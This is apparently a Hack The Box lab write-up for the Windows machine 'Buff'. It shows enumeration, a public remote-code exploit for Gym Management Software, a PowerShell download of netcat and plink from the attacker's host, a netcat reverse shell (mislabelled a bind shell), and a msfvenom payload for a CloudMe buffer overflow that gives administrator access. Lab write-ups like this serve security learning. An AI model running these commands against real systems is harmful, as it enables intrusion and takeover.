Posts Buff Writeup [HTB]
Post
Cancel

Buff Writeup [HTB]

Buff is a Windows machine rated as easy from Hack The Box, it consists on exploiting Gym Manager Software 1.0 to obtain initial access, and then, by doing port forwarding we can exploit a binary running on the machine via buffer overflow.

Enumeration

Running nmap :

1
2
3
4
5
6
7
8
9
nmap -sC -sV 10.10.10.198
Nmap scan report for 10.10.10.198
Host is up (0.079s latency).
Not shown: 999 filtered ports
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache httpd 2.4.43 ((Win64) OpenSSL/1.1.1g PHP/7.4.6)
|_http-open-proxy: Proxy might be redirecting requests
|_http-server-header: Apache/2.4.43 (Win64) OpenSSL/1.1.1g PHP/7.4.6
|_http-title: mrb3n's Bro Hut

Browsing to port 8080 we find the following page :

Web

Going to contact we see it has been made using Gym Management Software 1.0

Web

Exploitation

The following RCE exploit was found for Gym Management Software 1.0 :

https://www.exploit-db.com/exploits/48506

Running the exploit we get a limited web shell:

1
2
3
4
5
6
7
8
9
10
python exploit.py  'http://10.10.10.198:8080/'
/\
/vvvvvvvvvvvv \--------------------------------------,
`^^^^^^^^^^^^ /============BOKU====================="
\/

[+] Successfully connected to webshell.
C:\xampp\htdocs\gym\upload> whoami
�PNG
buff\shaun

To obtain a complete shell, we can upload netcat to the machine.

First we setup a python server :

1
python -m SimpleHTTPServer 80

Now we upload netcat to the victim machine :

1
C:\xampp\htdocs\gym\upload> powershell -c Invoke-WebRequest http://10.10.14.50/nc.exe -OutFile nc.exe

Using netcat to setup a bind shell :

1
C:\xampp\htdocs\gym\upload> nc.exe -e cmd.exe 10.10.14.50 443

And we obtain a complete shell as user Shaun :

1
2
3
4
5
6
7
8
9
nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49698
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\xampp\htdocs\gym\upload>whoami
whoami
buff\shaun

Privilege Escalation

Enumerating the machine I found Cloudme 1.11.2 inside Downloads :

1
2
3
4
5
Directory of C:\Users\shaun\Downloads

14/07/2020  13:27    <DIR>          .
14/07/2020  13:27    <DIR>          ..
16/06/2020  16:26        17,830,824 CloudMe_1112.exe

Then, running tasklist we see that Cloudme.exe is running :

1
2
C:\Users\shaun\Downloads>tasklist
CloudMe.exe                   2820                            0     36,396 K

Searching that binary I found a Buffer Overflow exploit for it

https://www.exploit-db.com/exploits/48389

As the windows machine didnt’t have python we need to use port forwarding to run the exploit locally, reading the exploit code we see the service is running in port 8888.

For this purpose we will be using plink:

1
2
C:\Users\shaun\Desktop>powershell -c Invoke-WebRequest http://10.10.14.50/plink.exe -OutFile plink.exe
C:\Users\shaun\Desktop>plink.exe -l root -pw hola123 -R 8888:127.0.0.1:8888 10.10.14.50

Now we update the shellcode for the exploit :

1
msfvenom -a x86 -p windows/shell_reverse_tcp LHOST=10.10.14.50 LPORT=4444 -b '\x00\x0A\x0D' -f python EXITFUNC=thread -v payload

Running the exploit gives us a reverse shell as administrator :

1
python cloudme.py
1
2
3
4
5
6
7
8
nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.50] from (UNKNOWN) [10.10.10.198] 49719
Microsoft Windows [Version 10.0.17134.1610]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
buff\administrator
This post is licensed under CC BY 4.0 by the author.